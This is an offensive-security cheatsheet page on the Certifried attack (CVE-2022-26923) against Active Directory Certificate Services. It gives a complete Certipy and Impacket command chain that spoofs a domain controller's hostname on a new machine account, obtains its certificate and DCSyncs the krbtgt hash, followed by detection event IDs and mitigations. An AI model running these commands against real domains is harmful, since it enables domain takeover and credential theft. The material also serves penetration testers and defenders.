daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-36-certifried-cve-2022-26923.md (4378B)


      1 ---
      2 title: "Attack #36 β€” Certifried (CVE-2022-26923)"
      3 description: "Certifried (CVE-2022-26923) exploits a flaw in how Active Directory maps computer account certificates to machine accounts. An attacker can create a new…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "credential-access", "persistence"]
      7 tools: ["Impacket", "Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/🟒 Attack #36 β€” Certifried (CVE-2022-26923).md"
     11 ---
     12 # 🟒 Attack #36 β€” Certificate Persistence (Certifried / CVE-2022-26923)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Certifried (CVE-2022-26923) exploits a flaw in how Active Directory maps computer account certificates to machine accounts. An attacker can create a new machine account (via MachineAccountQuota), change its `dNSHostName` attribute to match a Domain Controller's hostname, then request a Client Authentication certificate. The CA issues a certificate with the DC's hostname β€” allowing the attacker to authenticate as the DC and perform DCSync.
     19 
     20 ### Attack Flow
     21 
     22 ```
     23 1. Create machine account (FAKE$) via MachineAccountQuota
     24 2. Change FAKE$'s dNSHostName to DC01.corp.local
     25 3. Request a certificate using the Machine template
     26 4. CA issues cert with DC01.corp.local in the SAN
     27 5. Authenticate with the certificate β†’ impersonate DC01$
     28 6. DCSync β†’ domain compromise
     29 ```
     30 
     31 ***
     32 
     33 ## βš™οΈ Prerequisites
     34 
     35 | Requirement | Detail |
     36 |---|---|
     37 | **MachineAccountQuota > 0** | Default is 10 β€” allows domain users to create computer accounts |
     38 | **ADCS deployed with Machine template** | Standard deployment has this |
     39 | **Unpatched DCs** | CVE-2022-26923 patched in May 2022 |
     40 
     41 ***
     42 
     43 ## πŸ’» Full Commands
     44 
     45 ```bash
     46 # ── Step 1: Create machine account ────────────────────────────────────────────
     47 certipy account create -u low_user@corp.local -p 'Password1' \
     48   -user 'FAKE$' -pass 'FakePass123!' -dc-ip 10.10.10.10
     49 # Or:
     50 addcomputer.py -computer-name 'FAKE$' -computer-pass 'FakePass123!' \
     51   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
     52 
     53 # ── Step 2: Change dNSHostName to match DC ────────────────────────────────────
     54 certipy account update -u low_user@corp.local -p 'Password1' \
     55   -user 'FAKE$' -dns DC01.corp.local -dc-ip 10.10.10.10
     56 
     57 # ── Step 3: Request certificate for FAKE$ (with DC01 hostname) ───────────────
     58 certipy req -u 'FAKE$@corp.local' -p 'FakePass123!' -ca CORP-CA \
     59   -template Machine -dc-ip 10.10.10.10
     60 # CA issues cert with DC01.corp.local in SAN
     61 
     62 # ── Step 4: Restore dNSHostName (cleanup) ─────────────────────────────────────
     63 certipy account update -u low_user@corp.local -p 'Password1' \
     64   -user 'FAKE$' -dns FAKE.corp.local -dc-ip 10.10.10.10
     65 
     66 # ── Step 5: Authenticate as DC01$ ─────────────────────────────────────────────
     67 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
     68 # Returns DC01$ NT hash
     69 
     70 # ── Step 6: DCSync ────────────────────────────────────────────────────────────
     71 secretsdump.py corp.local/'DC01$'@DC01.corp.local \
     72   -hashes :<DC01_HASH> -just-dc-user krbtgt
     73 ```
     74 
     75 ***
     76 
     77 ## πŸ›‘οΈ Detection β€” Event IDs
     78 
     79 | Event ID | Source | What to Look For |
     80 |---|---|---|
     81 | **4741** | Security Log (DC) | Computer account creation |
     82 | **5136** | Security Log (DC) | dNSHostName attribute modification on computer object |
     83 | **4886** | Security Log (CA) | Certificate enrollment for machine account |
     84 
     85 ***
     86 
     87 ## πŸ”— Attack Chain Context
     88 
     89 ```
     90 [Certifried] ──→ Machine account cert abuse β†’ DC impersonation β†’ DCSync
     91          β”‚
     92          β”œβ”€β”€β†’ πŸ”— CVE-2022-26923 β€” patched May 2022
     93          β”œβ”€β”€β†’ πŸ’» Low-priv β†’ machine account β†’ DC cert β†’ full domain
     94          └──→ πŸ’€ Defeated by: patch, set MAQ=0, monitor dNSHostName changes
     95 ```
     96 
     97 ***
     98 
     99 > βœ… **Attack #36 β€” Certifried complete.**
    100 
    101 ***
    102 
    103 > 🏁 **Category 4 β€” ADCS Attacks is now COMPLETE (10/10 attacks).**